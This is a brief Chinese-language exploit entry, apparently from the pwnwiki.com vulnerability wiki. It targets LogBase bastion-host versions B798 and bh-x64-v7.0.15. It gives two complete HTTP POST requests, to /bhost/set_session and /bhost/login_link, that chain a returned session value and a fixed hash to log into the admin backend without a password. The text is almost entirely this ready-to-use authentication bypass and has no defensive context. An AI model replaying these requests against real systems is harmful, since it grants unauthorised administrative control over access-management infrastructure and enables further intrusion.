PWNWIK.COM
,
影响范围
LogBase-B798
bh-x64-v7.0.15
漏洞利用
获取INFO字段,u1参数值为用户名 POST /bhost/set_session HTTP/1.1Host:xx.xx.xx.xxu1=admin&m1=获得:
{"result":true,"info":"1562205376847","ErrMsg":""}
代入INFO字段进入如下请求a0参数值中
uCode参数值为用户名
POST /bhost/login_link HTTP/1.1Host: xx.xx.xx.xxa0=1562205376847&a1=&a10=2019-01-01+10:10:10&ha=CADFDF26E649FB6284D2FD424BD294B6&uCode=admin&vdcode=
利用后可成功登录后台
pwnwiki.com
